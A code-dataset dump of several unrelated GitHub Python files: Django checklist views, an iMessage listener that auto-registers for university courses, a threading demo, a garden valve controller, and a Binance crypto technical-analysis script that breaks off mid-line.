get_object_or_404(Master, pk=kwargs.get('pk', None))\n form = MasterForm(instance=obj)\n\n context = {\n \"page_title\": f\"Update Checklist: {obj}\",\n \"menu_section\": \"user_dashboards\",\n \"menu_subsection\": \"user_dashboards\",\n \"menu_action\": \"update\",\n \"obj\": obj,\n \"form\": form\n }\n\n return render(request, \"inspector_dashboard/checklist/form.html\", context)\n\n def post(self, request, *args, **kwargs):\n obj = get_object_or_404(Master, pk=kwargs.get('pk', None))\n form = MasterForm(instance=obj, data=request.POST)\n\n if form.is_valid():\n data = form.save()\n messages.success(\n request,\n f'{data} saved!',\n extra_tags='success'\n )\n\n return HttpResponseRedirect(\n reverse(\n 'inspector_dashboard_checklist_detail',\n kwargs={\n 'pk': data.pk\n }\n )\n )\n else:\n context = {\n \"page_title\": f\"Update Checklist: {obj}\",\n \"menu_section\": \"user_dashboards\",\n \"menu_subsection\": \"user_dashboards\",\n \"menu_action\": \"update\",\n \"obj\": obj,\n \"form\": form\n }\n\n messages.error(\n request,\n 'There were errors processing your request:',\n extra_tags='danger'\n )\n return render(request, \"inspector_dashboard/checklist/form.html\", context)\n\n\nclass InspectorDashboardChecklistDeleteView(LoginRequiredMixin, IsUserViewMixin, View):\n \"\"\"\n Create view for Checklist.\n\n Allowed HTTP verbs:\n - GET\n - POST\n\n Restrictions:\n - LoginRequired\n - Admin user\n\n Filters:\n - pk = kwargs.get('pk')\n \"\"\"\n\n def get(self, request, *args, **kwargs):\n obj = get_object_or_404(Master, pk=kwargs.get('pk', None))\n context = {\n \"page_title\": f\"Delete Checklist: {obj}\",\n \"menu_section\": \"user_dashboards\",\n \"menu_subsection\": \"user_dashboards\",\n \"menu_action\": \"delete\",\n \"obj\": obj\n }\n\n return render(request, \"inspector_dashboard/checklist/delete.html\", context)\n\n def post(self, request, *args, **kwargs):\n obj = get_object_or_404(Master, pk=kwargs.get('pk', None))\n\n messages.success(\n request,\n f'{obj} deleted!',\n extra_tags='success'\n )\n\n obj.delete()\n\n return HttpResponseRedirect(\n reverse(\n 'inspector_dashboard_checklist_list'\n )\n )\n","repo_name":"nujkram/rcbfp-backend-web","sub_path":"inspector_dashboards/controllers/views/inspector_dashboards/checklist/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":26263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1012084292","text":"import re\nfrom datetime import datetime, timedelta\nfrom imessage_reader.fetch_data import FetchData\n\nfrom listeners.listener import Listener\n\n\nTARGET_SENDER = \"22733\" # Notify.UW phone number\n\nSLN_REGEX = \"SLN: ([0-9]{5})\"\nTIME_REGEX = \"(20[0-9]{2}-[0,1][0-9]-[0-3][0-9]) ([0-2][0-9]:[0-5][0-9]:[0-5][0-9])\"\n\n\n# Returns true iff the message is from Notify.UW and is less than 30 seconds old\ndef extract(message):\n if TARGET_SENDER in message:\n regex_result = re.search(TIME_REGEX, str(message))\n\n if regex_result is not None:\n date = [int(i) for i in regex_result.group(1).split(\"-\")]\n time = [int(i) for i in regex_result.group(2).split(\":\")]\n\n timestamp = datetime(date[0], date[1], date[2], time[0], time[1], time[2])\n\n if timestamp >= datetime.now() - timedelta(seconds=30):\n return True\n\n return False\n\n\nclass iMessageListener(Listener):\n\n # Initialize object and iMessage reader\n def __init__(self, automator):\n super().__init__(\"iMessage Listener\", automator)\n\n self.previous_message = None\n self.iMessage = FetchData()\n\n print(\"iMessage Listener: Initialized\")\n\n # Scans inbox for unread Notify.UW messages\n def listener_task(self):\n # Extracts all Notify.UW messages that are less than 30 seconds old\n messages = list(filter(extract, self.iMessage.get_messages()))\n\n if len(messages) > 0:\n # Get index of oldest unread message\n try:\n index = messages.index(self.previous_message) + 1\n except ValueError:\n index = 0\n\n # Iterate through all unread messages\n while index < len(messages):\n message = messages[index]\n\n regex_result = re.search(SLN_REGEX, str(message))\n\n if regex_result is not None:\n sln_code = regex_result.group(1)\n\n print(f\"iMessage Listener: Course with SLN: {sln_code} has just opened up\")\n\n try:\n self.automator.register(sln_code)\n except Exception:\n print(f\"iMessage Listener: Could not register for SLN: {sln_code} \"\n \"since another listener is currently controlling Safari\")\n\n index += 1\n\n self.previous_message = messages[-1]\n\n else:\n self.previous_message = None\n","repo_name":"jamessrichie/course-hunter","sub_path":"listeners/imessage_listener.py","file_name":"imessage_listener.py","file_ext":"py","file_size_in_byte":2461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73676377449","text":"# condition方式的消费者和生成者模式\nimport threading,random,time\n\ngCondition = threading.Condition()\ngMoney = 1000\ngTime = 0\ngTotalTime = 10\n\nclass Producer(threading.Thread):\n def run(self):\n global gMoney\n global gTime\n while True:\n money = random.randint(100,1000)\n gCondition.acquire()\n gTime +=1\n if gTime >=gTotalTime:\n gCondition.release()\n break\n gMoney = gMoney + money\n # 唤醒所有休眠的线程\n gCondition.notify_all()\n print('生产者%s生成了%d的钱,一共有%d钱' %(threading.current_thread(),money,gMoney))\n gCondition.release()\n time.sleep(0.5)\n\nclass Consumer(threading.Thread):\n def run(self):\n global gMoney\n while True:\n money = random.randint(100,1000)\n gCondition.acquire()\n # 防止线程被唤醒是前面有线程排队,到本线程执行时,金库里的钱又不足的情况\n while gMoney < money:\n if gTime >=gTotalTime:\n gCondition.release()\n return\n print('消费者%s想消费了%d的钱,余额不足' %(threading.current_thread(),money))\n # 线程休眠,释放锁\n gCondition.wait()\n gMoney = gMoney - money\n print(\"消费者%s消费了%d的钱,剩余%d的钱\" %(threading.current_thread(),money,gMoney))\n gCondition.release()\n time.sleep(1)\n\ndef main():\n for x in range(5):\n t= Producer()\n t.start()\n \n for x in range(5):\n t = Consumer()\n t.start()\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"wangquan1024/webSpider","sub_path":"thread/demo5.py","file_name":"demo5.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19915279127","text":"import requests\nimport readJSON\nimport state\nimport config\nimport MQTTFunctions\nimport time\n\ndef sendCommandToWireless(myIP, myCommand):\n myURL = 'http://'+str(myIP)+'/'+myCommand\n \n try:\n if (config.SWDEBUG):\n print(\"myURL=\", myURL)\n req = requests.get(myURL,timeout=5)\n \n returnJSON = req.json()\n\n except Exception:\n #traceback.print_exc()\n return {} \n return returnJSON \n\n\ndef turnOnTimedValve(singleValve):\n\n\n if (len(str(singleValve[\"id\"]).replace(\" \", \"\")) > 1):\n # wireless ID\n \n wirelessJSON = readJSON.getJSONValue(\"WirelessDeviceJSON\")\n '''\n for singlewireless in wirelessJSON:\n if (str(singleValve[\"id\"]).replace(\" \",\"\") == str(singlewireless[\"id\"]).replace(\" \",\"\")):\n myIP = singlewireless[\"ipaddress\"]\n\n myCommand = \"setSingleValve?params=admin,\"+str(singleValve[\"ValveNumber\"])+\",1,\"+str(singleValve[\"OnTimeInSeconds\"])\n sendCommandToWireless(myIP, myCommand)\n '''\n MQTTFunctions.sendMQTTValve(str(singleValve[\"id\"]), str(singleValve[\"ValveNumber\"]), 1, str(singleValve[\"OnTimeInSeconds\"]))\n #\n # DEBUG slow down by 1 second\n #\n time.sleep(1)\n\ndef turnOffAllValves():\n\n wirelessJSON = readJSON.getJSONValue(\"WirelessDeviceJSON\")\n for singlewireless in wirelessJSON:\n #adminpassword, valve0state, valve0length, valve1state, valve1state, .......\n myIP = singlewireless[\"ipaddress\"]\n\n myCommand = \"setValves?params=admin,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0\"\n result = sendCommandToWireless(myIP, myCommand)\n if (config.SWDEBUG):\n print(\"return=\", result)\n\n \n\n","repo_name":"switchdoclabs/SDL_Pi_SmartGardenSystem2","sub_path":"AccessValves.py","file_name":"AccessValves.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"21757514870","text":"import time\nimport warnings\nfrom os import path\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport talib\nfrom binance.client import Client\nfrom binance.client import Client as BinanceClient\n\nfrom library import binance_obj, get_binance_interval_unit, AssetTicker, get_pickled, \\\n exclude_markets, find_first_maximum, save_to_file, get_klines, lowest_ask, get_time, key_dir, \\\n find_local_maximum, find_minimum_2, find_first_minimum, \\\n is_second_golden_cross, is_first_golden_cross, find_first_golden_cross, drop_below_ma, \\\n is_drop_below_ma200_after_rally, is_drop_below_ma50_after_rally, is_tradeable, slope, bias, check_wedge, \\\n is_falling_wedge, is_higher_low, get_binance_klines, get_kucoin_klines, get_kucoin_interval_unit, is_bull_flag, \\\n find_maximum_2, bull_cross, is_bull_cross_in_bull_mode, bear_cross, index_of_max_mas_difference, is_tilting, \\\n compute_wider_interval, get_setup_entry\n\nwarnings.filterwarnings('error')\n\n\ndef relative_strength_index(_closes, n=14):\n _prices = np.array(_closes, dtype=np.float32)\n\n _deltas = np.diff(_prices)\n _seed = _deltas[:n + 1]\n _up = _seed[_seed >= 0].sum() / n\n _down = -_seed[_seed < 0].sum() / n\n _rs = _up / _down\n _rsi = np.zeros_like(_prices)\n _rsi[:n] = 100. - 100. / (1. + _rs)\n\n for _i in range(n, len(_prices)):\n _delta = _deltas[_i - 1] # cause the diff is 1 shorter\n\n if _delta > 0:\n _upval = _delta\n _downval = 0.\n else:\n _upval = 0.\n _downval = -_delta\n\n _up = (_up * (n - 1) + _upval) / n\n _down = (_down * (n - 1) + _downval) / n\n\n _rs = _up / _down\n _rsi[_i] = 100. - 100. / (1. + _rs)\n\n return _rsi\n\n\ndef get_rsi(_market, _ticker, _time_interval):\n for _i in range(0, 10):\n try:\n _klines = get_klines(_market, _ticker, _time_interval)\n _closes = get_closes(_klines)\n return talib.RSI(_closes, timeperiod=14)\n except Warning:\n time.sleep(1)\n\n\nplt.figure(1)\n\n\n### prices\n\n# plt.subplot2grid((8, 1), (0, 0), rowspan = 4)\n# plt.plot(_closes[-wins:], 'k', lw = 1)\n\n# plt.subplot2grid((2, 1), (0, 0))\n# plt.plot(r[-wins:], color='black', lw=1)\n# plt.axhline(y=30, color='red', linestyle='-')\n# plt.axhline(y=70, color='blue', linestyle='-')\n\n\ndef get_magnitude(_reversed_max_ind, _max_val):\n try:\n return int(np.log10(_reversed_max_ind / np.abs(_max_val)))\n except Warning:\n return -1\n\n\ndef get_angle(p1, p2):\n return np.arctan((p2[1] - p1[1]) / (p2[0] - p1[0])) * 180 / np.pi\n\n\ndef is_signal_divergence_ratio(_macd, _macdsignal, _ratio, _start, _stop):\n _diff = _macd - _macdsignal\n _diff_max_val, _diff_reversed_max_ind = find_first_maximum(_diff[_start:_stop:1], 10)\n _diff_max_val2, _diff_reversed_max_ind2 = find_first_maximum(-_diff[_start:_stop:1], 10)\n if _diff_max_val2 > _diff_max_val:\n _diff_max_val = _diff_max_val2\n return np.abs((_diff[_stop] + _diff[_stop - 1]) / 2) / _diff_max_val <= _ratio\n\n\ndef is_rsi_slope_condition(_rsi, _rsi_limit, _angle_limit, _start, _stop, _window=10):\n if (_rsi[_stop] + _rsi[_stop - 1]) / 2 > _rsi_limit:\n return False\n _rsi_max_val, _rsi_reversed_max_ind = find_first_maximum(_rsi[_start:_stop:1], _window)\n _rsi_magnitude = get_magnitude(_rsi_reversed_max_ind, _rsi_max_val)\n if _rsi_magnitude == -1:\n return False\n _rsi_angle = get_angle((0, _rsi[_start:_stop:1][-1]),\n (_rsi_reversed_max_ind / np.power(10, _rsi_magnitude), _rsi_max_val))\n return _rsi_angle >= _angle_limit\n\n\ndef is_macd_condition(_macd, _angle_limit, _start, _stop, _window=10):\n _macd_max_val, _macd_reversed_max_ind = find_first_maximum(_macd[_start:_stop:1], _window)\n _macd_max_val2, _macd_reversed_max_ind2 = find_first_maximum(-_macd[_start:_stop:1], _window)\n if _macd_reversed_max_ind2 < _macd_reversed_max_ind:\n _current_macd = (_macd[_stop] + _macd[_stop - 1]) / 2\n _local_min_ratio = (_macd_max_val2 - np.abs(_current_macd)) / _macd_max_val2\n if _local_min_ratio > 0.2:\n # we have a minimum at first\n return False\n if _macd_reversed_max_ind == -1:\n return False\n _macd_magnitude = get_magnitude(_macd_reversed_max_ind, _macd_max_val)\n _macd_angle = get_angle((0, _macd[_start:_stop:1][-1]),\n (_macd_reversed_max_ind / np.power(10, _macd_magnitude), _macd_max_val))\n return _macd_angle >= _angle_limit\n\n\ndef get_closes(_klines):\n return np.array(list(map(lambda _x: float(_x[4]), _klines)))\n\n\ndef get_opens(_klines):\n return np.array(list(map(lambda _x: float(_x[1]), _klines)))\n\n\ndef get_tradeable_assets(_markets, _ticker):\n _time_interval = get_binance_interval_unit(_ticker)\n _tradeable_assets = []\n for _market in _markets:\n _asset = _market.split(\"BTC\")[0]\n try:\n if _asset:\n # print(_asset)\n _closes = get_closes(get_klines(_market, _ticker, _time_interval))\n # _rsi = relative_strength_index(_closes)\n _rsi = get_rsi(_market, _ticker, _time_interval)\n _macd, _macdsignal, _macdhist = talib.MACD(_closes, fastperiod=12, slowperiod=26, signalperiod=9)\n if is_tradeable(_closes, _rsi, _macd, _macdsignal):\n _tradeable_assets.append(AssetTicker(_asset, _ticker, lowest_ask(_market), time.time()))\n except Exception:\n print('Value Error for {} in {}'.format(_ticker, _market))\n sort_assets(_tradeable_assets)\n return _tradeable_assets\n\n\ndef get_tradeable_and_bullish_assets(_markets, _ticker):\n _time_interval = get_binance_interval_unit(_ticker)\n _assets = []\n for _market in _markets:\n _asset = _market.split(\"BTC\")[0]\n try:\n if _asset:\n # print(_asset)\n _klines = get_klines(_market, _ticker, _time_interval)\n _closes = get_closes(_klines)\n _opens = get_opens(_klines)\n _ma100 = talib.MA(_closes, timeperiod=100)\n _ma50 = talib.MA(_closes, timeperiod=50)\n _ma20 = talib.MA(_closes, timeperiod=20)\n _ma7 = talib.MA(_closes, timeperiod=7)\n\n _cond1 = bullishness_00(_opens, _closes, _ma100, _ma50, _ma20, _ma7) \\\n or bullishness_01(_opens, _closes, _ma100, _ma50, _ma20, _ma7) or bullishness_1(_opens,\n _closes,\n _ma100, _ma50,\n _ma20,\n _ma7) \\\n or bullishness_2(_opens, _closes, _ma100, _ma50, _ma20, _ma7) or bullishness_3(_opens, _closes,\n _ma100, _ma50,\n _ma20, _ma7)\n _rsi = get_rsi(_market, _ticker, _time_interval)\n _macd, _macdsignal, _macdhist = talib.MACD(_closes, fastperiod=12, slowperiod=26, signalperiod=9)\n _cond2 = is_tradeable(_closes, _rsi, _macd, _macdsignal)\n\n if _cond1 and _cond2:\n _assets.append(AssetTicker(_asset, _ticker, lowest_ask(_market), time.time()))\n except Exception as err:\n print('Exception for {} in {}'.format(_ticker, _market))\n # traceback.print_tb(err.__traceback__)\n sort_assets(_assets)\n return _assets\n\n\ndef get_bullish_assets(_markets, _ticker):\n _time_interval = get_binance_interval_unit(_ticker)\n _bullish_assets = []\n for _market in _markets:\n try:\n _asset = _market.split(\"BTC\")[0]\n if _asset:\n # print(_asset)\n _klines = get_klines(_market, _ticker, _time_interval)\n _closes = get_closes(_klines)\n _opens = get_opens(_klines)\n _ma100 = talib.MA(_closes, timeperiod=100)\n _ma50 = talib.MA(_closes, timeperiod=50)\n _ma20 = talib.MA(_closes, timeperiod=20)\n _ma7 = talib.MA(_closes, timeperiod=7)\n\n _cond1 = bullishness_00(_opens, _closes, _ma100, _ma50, _ma20, _ma7) \\\n or bullishness_01(_opens, _closes, _ma100, _ma50, _ma20, _ma7) or bullishness_1(_opens,\n _closes,\n _ma100, _ma50,\n _ma20,\n _ma7) \\\n or bullishness_2(_opens, _closes, _ma100, _ma50, _ma20, _ma7) or bullishness_3(_opens, _closes,\n _ma100, _ma50,\n _ma20, _ma7)\n\n if _cond1:\n _bullish_assets.append(AssetTicker(_asset, _ticker, lowest_ask(_market), time.time()))\n except Exception:\n print('Exception for {} in {}'.format(_ticker, _market))\n sort_assets(_bullish_assets)\n return _bullish_assets\n\n\ndef sort_assets(_assets):\n _assets.sort(key=lambda a: a.name)\n\n\ndef get_avg_last(_values, _stop, _window=1):\n return np.mean(_values[_stop - _window:])\n\n\ndef get_std_last(_values, _stop, _window=1):\n return np.std(_values[_stop - _window:])\n\n\ndef get_last(_values, _stop, _window=1):\n return _values[_stop - _window + 1:]\n\n\ndef get_avg_last_2(_values, _stop, _window=2):\n return np.mean(_values[_stop - _window + 1:_stop])\n\n\ndef get_last_2(_values, _stop, _window=2):\n return _values[_stop - _window + 1:_stop]\n\n\ndef bullishness_00(_opens, _closes, _ma100, _ma50, _ma20, _ma7, _stop=-1):\n _curr_ma100 = get_avg_last(_ma100, _stop)\n _curr_ma50 = get_avg_last(_ma50, _stop)\n _curr_ma_20 = get_avg_last(_ma20, _stop)\n _curr_ma_7 = get_avg_last(_ma7, _stop)\n _curr_ma = _curr_ma_20\n _mean_open = get_avg_last(_opens, _stop, 10)\n _curr_close = get_avg_last(_closes, _stop)\n _closing_diff = _curr_close - _curr_ma\n _opening_diff = _curr_ma - _mean_open\n _cond_1 = _closing_diff < 0 and _closing_diff / _curr_ma < 0.05 # up to 5 percent in difference we trust! <0 is good for bouncing detector\n _cond_2 = _opening_diff > 0 and _opening_diff / _mean_open < 0.05 # up to 5 percent in difference we trust!\n return _curr_ma_20 > _curr_ma50 > _curr_ma100 and _cond_1 and _cond_2\n\n\ndef bullishness_01(_opens, _closes, _ma100, _ma50, _ma20, _ma7, _stop=-1):\n _curr_ma100 = get_avg_last(_ma100, _stop)\n _curr_ma50 = get_avg_last(_ma50, _stop)\n _curr_ma_20 = get_avg_last(_ma20, _stop)\n _curr_ma_7 = get_avg_last(_ma7, _stop)\n _curr_ma = _curr_ma_20\n _mean_open = get_avg_last(_opens, _stop, 10)\n _curr_close = get_avg_last(_closes, _stop)\n _closing_diff = _curr_close - _curr_ma\n _opening_diff = _curr_ma - _mean_open\n _cond_1 = _closing_diff > 0 and _closing_diff / _curr_ma < 0.05 # up to 5 percent in difference we trust! <0 is good for bouncing detector\n _cond_2 = _opening_diff > 0 and _opening_diff / _mean_open < 0.05 # up to 5 percent in difference we trust!\n return _curr_ma_20 > _curr_ma50 > _curr_ma100 and _cond_1 and _cond_2\n\n\ndef bullishness_1(_opens, _closes, _ma100, _ma50, _ma20, _ma7, _stop=-1):\n _curr_ma100 = get_avg_last(_ma100, _stop)\n _curr_ma50 = get_avg_last(_ma50, _stop)\n _curr_ma_20 = get_avg_last(_ma20, _stop)\n _curr_ma_7 = get_avg_last(_ma7, _stop)\n _curr_ma = _curr_ma_7\n _mean_open = get_avg_last(_opens, _stop, 10)\n _curr_close = get_avg_last(_closes, _stop)\n _closing_diff = _curr_close - _curr_ma\n _opening_diff = _curr_ma - _mean_open\n _cond_1 = _closing_diff > 0 and _closing_diff / _curr_ma < 0.05 # up to 5 percent in difference we trust! <0 is good for bouncing detector\n _cond_2 = _opening_diff > 0 and _opening_diff / _mean_open < 0.05 # up to 5 percent in difference we trust!\n return _curr_ma_7 < _curr_ma_20 > _curr_ma50 > _curr_ma100 and _cond_1 and _cond_2\n\n\ndef bullishness_2(_opens, _closes, _ma100, _ma50, _ma20, _ma7, _stop=-1):\n _curr_ma100 = get_avg_last(_ma100, _stop)\n _curr_ma50 = get_avg_last(_ma50, _stop)\n _curr_ma20 = get_avg_last(_ma20, _stop)\n _mean_open = get_avg_last(_opens, _stop, 10)\n _curr_open = get_avg_last(_opens, _stop)\n _curr_close = get_avg_last(_closes, _stop)\n _closing_diff = _curr_close - _curr_ma20\n _opening_diff = _curr_ma20 - _mean_open\n _cond_1 = _closing_diff > 0 and _closing_diff / _curr_ma20 < 0.05 # up to 5 percent in difference we trust!\n _cond_2 = _opening_diff > 0 and _opening_diff / _mean_open < 0.05 # up to 5 percent in difference we trust!\n return _curr_ma20 < _curr_ma50 > _curr_ma100 and _cond_1 and _cond_2\n\n\ndef bullishness_3(_opens, _closes, _ma100, _ma50, _ma20, _ma7, _stop=-1):\n _curr_ma100 = get_avg_last(_ma100, _stop)\n _curr_ma50 = get_avg_last(_ma50, _stop)\n _curr_ma20 = get_avg_last(_ma20, _stop)\n _curr_ma7 = get_avg_last(_ma7, _stop)\n _mean_open = get_avg_last(_opens, _stop, 10)\n _curr_open = get_avg_last(_opens, _stop)\n _curr_close = get_avg_last(_closes, _stop)\n _closing_diff = _curr_close - _curr_ma7\n _opening_diff = _curr_ma7 - _mean_open\n _cond_1 = _closing_diff > 0 and _closing_diff / _curr_ma7 < 0.05 # up to 5 percent in difference we trust!\n _cond_2 = _opening_diff > 0 and _opening_diff / _mean_open < 0.05 # up to 5 percent in difference we trust!\n _cond_3 = _curr_ma7 < _curr_ma20 < _curr_ma50\n\n return _cond_1 and _cond_2 and _cond_3\n\n\ndef aggregate_assets(_map, _assets, _ticker):\n for _asset in _assets:\n if _asset.name in _map:\n _map[_asset.name].add_ticker(_ticker)\n else:\n _map[_asset.name] = _asset\n\n\ndef post_proc(_map):\n _list = list(map(lambda x: x[1], _map.items()))\n _list.sort(key=lambda a: len(a.tickers))\n _list.reverse()\n return _list\n\n\ndef print_assets(_assets):\n for _a in _assets:\n print(_a.name + \" : \" + ' '.join(_a.tickers) + \" ask price : \" + \"{:.8f} time : {}\".format(_a.ask_price,\n get_time(\n _a.timestamp)))\n\n\ndef analyze_markets():\n markets = binance_obj.get_all_btc_currencies(exclude_markets)\n\n # tickers = [Client.KLINE_INTERVAL_3MINUTE, Client.KLINE_INTERVAL_5MINUTE,\n # Client.KLINE_INTERVAL_15MINUTE, Client.KLINE_INTERVAL_30MINUTE, Client.KLINE_INTERVAL_1HOUR,\n # Client.KLINE_INTERVAL_2HOUR,\n # Client.KLINE_INTERVAL_4HOUR, Client.KLINE_INTERVAL_6HOUR, Client.KLINE_INTERVAL_8HOUR,\n # Client.KLINE_INTERVAL_12HOUR,\n # Client.KLINE_INTERVAL_1DAY, Client.KLINE_INTERVAL_3DAY]\n\n tickers = [Client.KLINE_INTERVAL_12HOUR]\n\n print(\"bullish & tradeable assets\")\n bullish_tradeable_map = {}\n for ticker in tickers:\n aggregate_assets(bullish_tradeable_map, get_tradeable_and_bullish_assets(markets, ticker), ticker)\n\n bullish_tradeable_list = post_proc(bullish_tradeable_map)\n print_assets(bullish_tradeable_list)\n\n print(\"bullish assets\")\n bullish_map = {}\n for ticker in tickers:\n aggregate_assets(bullish_map, get_bullish_assets(markets, ticker), ticker)\n\n bullish_list = post_proc(bullish_map)\n print_assets(bullish_list)\n\n print(\"tradeable assets\")\n tradeable_map = {}\n for ticker in tickers:\n aggregate_assets(tradeable_map, get_tradeable_assets(markets, ticker), ticker)\n\n tradeable_list = post_proc(tradeable_map)\n print_assets(tradeable_list)\n\n\n#\n# markets = binance.get_all_btc_currencies(exclude_markets)\n# ticker = Client.KLINE_INTERVAL_30MINUTE\n# tradeable_assets_30min = get_tradeable_assets(markets, ticker)\n#\n# markets = binance.get_all_btc_currencies(exclude_markets)\n# ticker = Client.KLINE_INTERVAL_4HOUR\n# tradeable_assets_4h = get_tradeable_assets(markets, ticker)\n#\n# markets = binance.get_all_btc_currencies(exclude_markets)\n# ticker = Client.KLINE_INTERVAL_6HOUR\n# tradeable_assets_6h = get_tradeable_assets(markets, ticker)\n#\n# markets = binance.get_all_btc_currencies(exclude_markets)\n# ticker = Client.KLINE_INTERVAL_12HOUR\n# tradeable_assets_12h = get_tradeable_assets(markets, ticker)\n\n\ndef is_magnitude_gt(_val, _m):\n return np.log10(_val) > _m\n\n\ndef get_most_volatile_market():\n _filename = \"exclude-markets\"\n _ticker = Client.KLINE_INTERVAL_3MINUTE\n _volatile_markets = {}\n _exclude_markets = {}\n _window = \"1 days ago\"\n if path.isfile(key_dir + _filename + \".pkl\"):\n _exclude_markets = get_pickled(key_dir, _filename)\n else:\n _exclude_markets[_ticker] = exclude_markets\n _markets = binance_obj.get_all_btc_currencies(_exclude_markets[_ticker])\n _window = \"1 day ago\"\n for _market in _markets:\n try:\n _klines = get_klines(_market, _ticker, _window)\n _closes = get_closes(_klines)\n if _market == 'COCOSBTC':\n i = 1\n if is_magnitude_gt(_closes[-1], -6.5):\n _std = get_std_last(_closes, 1)\n _volatile_markets[_market] = _std / _closes[-1]\n except Exception:\n print(f\"No data for market : {_market}\")\n if _ticker in _exclude_markets:\n _exclude_markets[_ticker].append(_market)\n else:\n _exclude_markets[_ticker] = [_market]\n _s = sorted(_volatile_markets, key=_volatile_markets.get, reverse=True)\n save_to_file(key_dir, \"exclude-markets\", _exclude_markets)\n i = 1\n\n\ndef is_falling_wedge_0(_closes):\n _max_val, _index_max_val = find_first_maximum(_closes, 5)\n _max_val0, _index_max_val0 = find_first_maximum(_closes[:-_index_max_val], 5)\n _max_val2, _index_max_val2 = find_first_maximum(_closes[-_index_max_val:], 3)\n _min_va11, _index_min_val1 = find_first_minimum(_closes[-_index_max_val:], 3)\n _min_val, _index_min_val2 = find_first_minimum(_closes[-_index_max_val:-_index_max_val2][::-1], 3)\n _index_min_val = _index_max_val2 + _index_min_val2 + 1\n _magnitude = get_magnitude(_index_max_val, _max_val)\n _slope_max = slope(-_index_max_val, _max_val * np.power(10, _magnitude), -_index_max_val2,\n _max_val2 * np.power(10, _magnitude))\n _slope_min = slope(-_index_min_val, _min_val * np.power(10, _magnitude), -_index_min_val1,\n _min_va11 * np.power(10, _magnitude))\n\n _b_max = bias(-_index_max_val, _max_val * np.power(10, _magnitude), -_index_max_val2,\n _max_val2 * np.power(10, _magnitude))\n _b_min = bias(-_index_min_val, _min_val * np.power(10, _magnitude), -_index_min_val1,\n _min_va11 * np.power(10, _magnitude))\n\n _checked_max = check_wedge(_slope_max, _b_max, range(-_index_max_val, 0),\n _closes[-_index_max_val:] * np.power(10, _magnitude))\n _checked_min = check_wedge(_slope_min, _b_min, range(-_index_max_val, 0),\n _closes[-_index_max_val:] * np.power(10, _magnitude), True)\n\n _max0_cond = _max_val0 * np.power(10, _magnitude) <= -_slope_max * _index_max_val0 + _b_max\n\n _at1 = np.math.atan(_slope_max)\n _at2 = np.math.atan(_slope_min)\n _deg1 = np.math.degrees(_at1)\n _deg2 = np.math.degrees(_at2)\n _diff_deg = _deg2 - _deg1\n _wedge_formed = 0 < _diff_deg < 60.0\n\n plt.subplot2grid((1, 1), (0, 0))\n plt.plot(-_index_max_val, _max_val * np.power(10, _magnitude), 'g^')\n plt.plot(-_index_max_val2, _max_val2 * np.power(10, _magnitude), 'g^')\n plt.plot(-_index_min_val, _min_val * np.power(10, _magnitude), 'bs')\n plt.plot(-_index_min_val1, _min_va11 * np.power(10, _magnitude), 'bs')\n\n t = range(-_index_max_val, 0)\n y1 = _slope_max * t + _b_max\n y2 = _slope_min * t + _b_min\n\n plt.plot(t, y1)\n plt.plot(t, y2)\n plt.plot(t, np.array(_closes[-_index_max_val:]) * np.power(10, _magnitude))\n\n plt.show()\n i = 1\n\n\ndef is_bull_flag0(_klines):\n _closes = np.array(list(map(lambda _x: float(_x.closing), _klines)))\n _opens = np.array(list(map(lambda _x: float(_x.opening), _klines)))\n _high = list(map(lambda _x: float(_x.highest), _klines))\n _low = list(map(lambda _x: float(_x.lowest), _klines))\n\n _max_val, _index_max_val = find_first_maximum(_closes, 5)\n\n _rsi = relative_strength_index(_closes)\n\n _r_max_val_max, _r_max_ind = find_first_maximum(_rsi, 10)\n _r_min_val_max, _r_min_ind0 = find_first_minimum(_rsi[:-_r_max_ind], 10)\n _r_min_ind = _r_max_ind + _r_min_ind0\n _rsi_mean = np.mean(_rsi[-_r_min_ind:])\n _is_bullish = _rsi_mean > 58.0\n\n _rev_min_val, _rev_min_ind0 = find_first_minimum(_closes[-_r_max_ind:][::-1], 10)\n _rev_min_ind = len(_closes[-_r_max_ind:]) - _rev_min_ind0\n _rev_max_val, _rev_max_ind0 = find_first_maximum(_closes[-_rev_min_ind:][::-1], 10)\n _rev_max_ind = _rev_min_ind - _rev_max_ind0 + 1\n _min_after_max_rev = np.mean(_closes[-_rev_max_ind:])\n _is_min_existing = _rev_min_val < _min_after_max_rev\n\n _rsi_last_avg = np.mean(_rsi[-10:])\n\n _ma50 = talib.MA(_closes, timeperiod=50)\n\n _c_m = np.mean(_closes[-10:])\n _r_m = np.mean(_ma50[-10:])\n _closes_above_ma50 = _c_m > _r_m\n\n return _is_bullish and _is_min_existing and _rsi_last_avg > 50.0 and _closes_above_ma50\n\n\ndef find_valuable_alts(_closes):\n _min_val = np.min(_closes)\n _max = np.max(_closes)\n return (_max-_min_val)/_min_val > 3\n\n\ndef check_ma_crossing(_ma, _highs, _n=5):\n for _i in range(_n):\n if _highs[-_i] > _ma[-_i] or (_ma[-_i] - _highs[-_i])/_highs[-_i] < 0.015 :\n return True\n return False\n\n\ndef find_zero(_data):\n for _i in range(len(_data)):\n if _data[len(_data) - _i - 1] > 0 > _data[len(_data) - _i - 2]:\n return _i\n return -1\n\n\ndef get_bid_price(_data, _lows):\n _ind = find_zero(_data)\n return np.min(_lows[len(_lows)-_ind-3:len(_lows)-_ind+1])\n\n\ndef main():\n # asset = Asset(exchange=\"binance\", name=\"LINK\", ticker=BinanceClient.KLINE_INTERVAL_1HOUR)\n # is_bullish_setup(asset)\n # analyze_markets()\n # get_most_volatile_market()\n\n asset = \"NEO\"\n market = \"{}BTC\".format(asset)\n # ticker = BinanceClient.KLINE_INTERVAL_30MINUTE\n ticker = BinanceClient.KLINE_INTERVAL_1HOUR\n time_interval = \"2 weeks ago\"\n\n # _klines = get_binance_klines(market, ticker, time_interval)\n _kucoin_ticker = \"1day\"\n # _klines = get_kucoin_klines(market, _kucoin_ticker, get_kucoin_interval_unit(_kucoin_ticker, 400))\n\n # _klines = get_klines(market, ticker, 